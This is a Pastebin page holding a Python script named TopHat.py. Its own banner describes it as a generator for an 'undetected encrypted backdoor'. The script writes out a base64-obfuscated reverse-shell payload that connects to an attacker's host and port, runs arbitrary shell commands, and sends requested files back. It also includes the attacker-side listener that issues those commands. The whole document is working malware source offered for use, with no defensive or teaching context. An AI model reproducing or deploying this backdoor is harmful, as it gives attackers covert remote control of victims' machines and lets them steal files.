API tools faq
paste
Advertisement
Guest User

TopHat.py

a guest
Jun 11th, 2018
4,189
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.92 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. import socket
  4. import os
  5. import sys
  6. import time
  7. import base64
  8. from Crypto.PublicKey import RSA
  9. from Crypto.PublicKey import RSA
  10. from subprocess import check_output
  11.  
  12. if len(sys.argv) == 3:
  13. addresser = sys.argv[1]
  14. porterica = sys.argv[2]
  15. else:
  16. print """
  17. _____ _ _ _
  18. |_ _|__ _ __ | | | | __ _| |_
  19. | |/ _ \| '_ \| |_| |/ _` | __|
  20. | | (_) | |_) | _ | (_| | |_
  21. |_|\___/| .__/|_| |_|\__,_|\__|
  22. |_|
  23. Description:
  24. TopHat is a inspired by metasploits capabilties of meterpreter however i have coded a script to generate a -
  25. undetected encrypted backdoor using python.
  26. Usage:
  27. ./TopHat <lhost> <lport>
  28. """
  29. sys.exit()
  30.  
  31. print "[*] Generating SSL Certificates"
  32. time.sleep(3)
  33. #Generate new key that's 4096 bits long
  34. new_key = RSA.generate(4096)
  35.  
  36. #Export the key in PEM format
  37. public_key = new_key.publickey().exportKey("PEM")
  38. private_key = new_key.exportKey("PEM")
  39. backdoor_code_ot = """
  40. import socket
  41. import subprocess
  42. import os
  43. from Crypto.PublicKey import RSA
  44. def encrypt(message):
  45. publickey = '''""" + public_key + """'''
  46.  
  47. encryptor = RSA.importKey(publickey)
  48. encryptedData = encryptor.encrypt(message, 0)
  49. return encryptedData[0]
  50. def decrypt(cipher):
  51. privatekey = '''""" + private_key + """'''
  52.  
  53. decryptor = RSA.importKey(privatekey)
  54. return decryptor.decrypt(cipher)
  55. def transfer(s,path):
  56.  
  57. if os.path.exists(str(path)):
  58. f = open(path, 'rb')
  59. packet = f.read(1024)
  60. while packet != '':
  61. s.send(packet)
  62. packet = f.read(1024)
  63. s.send('DONE')
  64. f.close()
  65. else:
  66. s.send('File not found')
  67. def connect():
  68. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  69. s.connect(('""" + addresser + """',""" + porterica + """))
  70. while True:
  71. command = decrypt(s.recv(1024))
  72. if 'exit' in command:
  73. s.close()
  74. break
  75. if 'grab' in command:
  76. grab, path = command.split('*')
  77. try:
  78. transfer(s, path)
  79. except Exception, e:
  80. s.send(str(e))
  81. pass
  82.  
  83.  
  84. else:
  85. CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  86. result = CMD.stdout.read()
  87. if len(result) > 512:
  88. for i in range(0, len(result), 512):
  89. chunk = result[0+i:512+i]
  90. s.send(encrypt(chunk))
  91. else:
  92. s.send(encrypt(result))
  93. #s.send(encrypt(CMD.stderr.read()))
  94. def main():
  95. connect()
  96. if __name__ == '__main__':
  97. main()
  98. """
  99. backerraka = base64.b64encode(backdoor_code_ot)
  100. backdoor_code = "import base64, sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('" + backerraka + "')))"
  101.  
  102. def encrypt(message):
  103. publickey = public_key
  104.  
  105. encryptor = RSA.importKey(publickey)
  106. encryptedData = encryptor.encrypt(message, 0)
  107. return encryptedData[0]
  108.  
  109.  
  110.  
  111. def decrypt(cipher):
  112. privatekey = private_key
  113.  
  114. decryptor = RSA.importKey(privatekey)
  115. return decryptor.decrypt(cipher)
  116.  
  117.  
  118. def transfer(conn, command):
  119.  
  120. conn.send(command)
  121. f = open('/root/Desktop/somefile', 'wb')
  122. while True:
  123. bits = conn.recv(1024)
  124. if 'File not found' in bits:
  125. print '[-] File not found'
  126. break
  127. if bits.endswith('DONE'):
  128. print '[-] File transfer complete'
  129. f.close()
  130. break
  131. f.write(bits)
  132. f.close()
  133.  
  134.  
  135. def connect():
  136. print "[*] Creating Backdoor..."
  137. liag = open("backdoor.py","w")
  138. liag.write(backdoor_code)
  139. liag.close()
  140. print "[*] Started reverse handler on %s:%s" % (addresser,porterica)
  141. print "[*] Starting the payload handler..."
  142. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  143. s.bind((addresser,int(porterica)))
  144. s.listen(1)
  145. conn, addr = s.accept()
  146. print '[*] TopHat session 1 opened %s:%s -> %s\n' % (addresser,porterica,addr)
  147. while True:
  148. store = ''
  149. command = raw_input("tophat > ")
  150. command = encrypt(command)
  151.  
  152. if 'exit' in command:
  153. #Send terminate signal to the client
  154. conn.send('exit')
  155. #Close the connection to the client on the server end
  156. conn.close()
  157. sys.exit()
  158.  
  159. if 'grab' in command:
  160. transfer(conn, command)
  161.  
  162. else:
  163. conn.send(command)
  164. result = conn.recv(1024)
  165. if len(decrypt(result)) == 512:
  166. store = store + decrypt(result)
  167. result = conn.recv(512)
  168. store = store + decrypt(result)
  169.  
  170. else:
  171. print decrypt(result)
  172.  
  173. def main():
  174. connect()
  175.  
  176. if __name__ == '__main__':
  177. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!